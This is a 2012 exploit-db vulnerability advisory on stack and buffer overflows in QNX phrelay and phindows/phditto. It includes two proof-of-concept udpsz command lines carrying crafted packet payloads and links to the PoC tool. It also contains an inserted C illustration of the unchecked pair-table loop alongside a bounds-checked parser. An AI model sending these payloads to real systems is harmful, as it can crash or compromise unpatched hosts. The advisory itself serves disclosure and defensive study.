QNX phrelay/phindows/phditto – Multiple Vulnerabilities

  • Author: Luigi Auriemma
    Date: 2012-05-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18864/

    #######################################################################
    
     Luigi Auriemma
    
    Application:  QNX phrelay/phindows/phditto
                  http://www.qnx.com
                  http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
                  http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
    Versions:     current
    Platforms:    QNX Neutrino RTOS and Windows
    Bugs:         A] bpe_decompress stack overflow
                  B] Photon Session buffer overflow
    Exploitation: remote
                  A] versus client and maybe server
                  B] versus server
    Date:         10 May 2012
    Author:       Luigi Auriemma
    e-mail:       aluigi@autistici.org
    web:          aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bugs
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    phrelay and phindows/phditto are based on a proprietary protocol that
    lets the Photon graphical environment of a QNX server (exported through
    the phrelay inetd program) be used from another machine (phindows,
    phditto or any other client implementing the protocol).
    
    
    #######################################################################
    
    =======
    2) Bugs
    =======
    
    --------------------------------
    A] bpe_decompress stack overflow
    --------------------------------
    
    The BPE (byte pair encoding) compression uses two 256-byte stack
    buffers called "left" and "right".
    The bpe_decompress function, shared by all the client and server
    programs of this protocol, is affected by a stack-based buffer
    overflow: the data is stored sequentially into these two buffers and
    the index is driven by the attacker-controlled count bytes with no
    bounds check, so a crafted pair table writes past the end of both
    arrays.
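    As an added example (not code from the advisory and not QNX's
    bpe_decompress), the pair-table loop below follows the layout of the
    public-domain reference BPE decoder (Philip Gage, 1994), whose expand
    routine keeps left[256] and right[256] on the stack and advances the
    code index c by attacker-supplied count bytes; that QNX's implementation
    uses the same table format is an assumption here, the advisory only
    states that the two 256-byte buffers are filled sequentially without
    checks. All function names and the two sample tables are constructed
    for this illustration. The first function only tracks the index the
    unchecked loop would store into, so the overflow can be shown without
    corrupting memory; the second is the same parser with the missing
    bounds checks added.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One BPE pair table: left[c] == c marks code c as a literal. */
struct bpe_table {
    unsigned char left[256];
    unsigned char right[256];
};

/* Constructed inputs (not from the advisory).
 * Format (reference decoder): a count byte; if count > 127 it means
 * "skip count-127 literal codes" and then one pair follows; otherwise
 * count+1 pairs follow. A pair is a left byte, plus a right byte when
 * the left byte differs from the code index. The table ends when the
 * index reaches exactly 256. */
static const uint8_t kGoodTable[] = {
    0x00, 0x41, 0x42,   /* one pair at code 0: left 'A', right 'B'     */
    0xFE, 0x80,         /* skip 127 -> code 128, literal pair (0x80)   */
    0xFE                /* skip 127 -> index 256, table complete       */
};
static const uint8_t kBadTable[] = {
    0xFF, 0x41, 0x42,   /* skip 128 -> code 128, pair 'A','B'          */
    0xFF, 0x43, 0x44    /* skip 128 -> index 257: never equals 256,    */
                        /* the unchecked loop writes left[257]/right[257] */
};

/* Walk the table the way the unchecked reference loop does, tracking only
 * the index it would write to. Returns the highest index stored (or -1 if
 * nothing is stored). A result > 255 means left[]/right[] are overflowed. */
int bpe_unchecked_max_index(const uint8_t *in, size_t len)
{
    size_t pos = 0;
    int c = 0, count, i, max = -1;

    if (len == 0) return -1;
    count = in[pos++];
    for (;;) {
        if (count > 127) { c += count - 127; count = 0; }  /* unchecked skip */
        if (c == 256) break;                               /* only exit test */
        for (i = 0; i <= count; i++, c++) {
            if (pos >= len) return max;
            if (c > max) max = c;            /* reference: left[c] = byte */
            uint8_t l = in[pos++];
            if (l != c) {                    /* reference: right[c] = byte */
                if (pos >= len) return max;
                pos++;
            }
        }
        if (c == 256) break;
        if (pos >= len) return max;
        count = in[pos++];
    }
    return max;
}

/* Hardened parser for the same format: every index and every read is
 * bounds-checked. Returns bytes consumed, or -1 on malformed input. */
int bpe_parse_pair_table(const uint8_t *in, size_t len, struct bpe_table *t)
{
    size_t pos = 0;
    int c, count, i;

    for (c = 0; c < 256; c++) t->left[c] = (unsigned char)c;  /* all literal */
    if (pos >= len) return -1;
    count = in[pos++];
    for (c = 0;;) {
        if (count > 127) { c += count - 127; count = 0; }
        if (c == 256) break;
        if (c > 256) return -1;                 /* the check the reference lacks */
        for (i = 0; i <= count; i++, c++) {
            if (c >= 256) return -1;            /* pairs past the end of the table */
            if (pos >= len) return -1;
            t->left[c] = in[pos++];
            if (t->left[c] != c) {
                if (pos >= len) return -1;
                t->right[c] = in[pos++];
            }
        }
        if (c == 256) break;
        if (pos >= len) return -1;
        count = in[pos++];
    }
    return (int)pos;
}

int main(void)
{
    struct bpe_table t;
    printf("well-formed table: highest index written = %d\n",
           bpe_unchecked_max_index(kGoodTable, sizeof kGoodTable));
    printf("crafted table:     highest index written = %d (>255 = overflow)\n",
           bpe_unchecked_max_index(kBadTable, sizeof kBadTable));
    printf("hardened parser:   well-formed -> %d bytes, crafted -> %d\n",
           bpe_parse_pair_table(kGoodTable, sizeof kGoodTable, &t),
           bpe_parse_pair_table(kBadTable, sizeof kBadTable, &t));
    return 0;
}
```

    The point to take from the trace is that the reference loop only tests
    c == 256, so a skip that jumps over 256 is never caught and every later
    pair lands beyond the two arrays; the fix is the pair of range checks
    on c, not a larger buffer.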
    
    
    ---------------------------------
    B] Photon Session buffer overflow
    ---------------------------------
    
    A buffer overflow in phrelay in the handling of the device file name
    that the client specifies as an existing Photon session.
    
    
    Note: considering that phrelay is not enabled by default and allows
    connecting without authentication directly to /dev/photon (the screen
    physically visible on the machine), and that phindows/phditto must be
    manually pointed at the malicious host to exploit bug A, this advisory
    must be considered only a case study and nothing more.
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
    
    
    A]
    At the moment I don't know how to call bpe_decompress on phrelay, but I
    have verified that the bpe_decompress function is 100% vulnerable.
    The following test works only on phindows/phditto (the proof-of-concept
    acts as a server):
    
    udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff
    
    B]
    udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################